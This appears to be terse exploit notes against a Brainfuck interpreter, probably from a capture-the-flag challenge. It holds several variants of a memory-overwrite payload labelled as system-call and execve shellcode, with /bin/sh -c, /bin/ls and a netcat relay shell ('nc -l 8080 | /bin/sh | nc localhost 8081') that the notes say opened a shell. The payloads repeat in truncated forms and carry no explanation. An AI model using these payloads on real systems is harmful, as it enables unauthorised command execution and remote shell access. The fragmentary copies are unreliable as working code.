0xf7e4c3b0
System version:
--[++>--]++
>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>
>>>>>>>>
--------
---------
<
----
----------------
------------
<
+
++++++++++++++++
++++++++++++++++
++++++++++++++++
+++
<
+
++++++++++++++++
++++++++++++++++
++++++++++++++++
++++++
>>>>>>>>>>>
-
<
-
<
----------------
----------------
----------------
--
<
----------------
----------------
----------------
----------------
|||||||||||||||||||||||||||||||
/bin/sh -c

--[++>--]++ >>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>> >>>>>>>> -------- --------- < ---- ---------------- ------------ < + ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ +++ < + ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ ++++++ >>>>[-]>[-]>+>+>>>> - < - < ---------------- ---------------- ---------------- -- < ---------------- ---------------- ---------------- --------|||||||||/bin/sh -c

--[++>--]++ >>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>> >>>>>>>> -------- --------- < ---- ---------------- ------------ < + ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ +++ < + ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ ++++++ >>>>[-]>[-]>+>+>>>> - < - < ---------------- ---------------- ---------------- -- < ---------------- -------------|/bin/ls;/bin/echo 

Final shellcode using system call:
--[++>--]++ >>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>> >>>>>>>> -------- --------- < ---- ---------------- ------------ < + ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ +++ < + ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ ++++++ >>>>[-]>[-]>+>+>>>> - < - < ---------------- ---------------- ---------------- -- < ---------------- -----|/bin/ls

Another?
..this opened the shell.
--[++>--]++ >>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>> >>>>>>>> -------- --------- < ---- ---------------- ------------ < + ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ +++ < + ++++++++++++++++ ++++++++++++++++ ++++++++++++++++ ++++++ >>>>[-]>[-]>+>+>>>> - < - < ---------------- ---------------- ---------------- -- < ---------------- -------------nc -l 8080 | /bin/sh | nc localhost 8081


Execve version:
--[++>--]++
>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>
>>>>>>>>
--------
---------
<
----
----------------
----
<
----------------
----------------
----------------
----------------
----------------
----------------
--------
<
----------------
----------------
----------------
----------------
----------------
---------
>>>>>>>>>>>
-
<
-
<
----------------
----------------
----------------
-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/bin/sh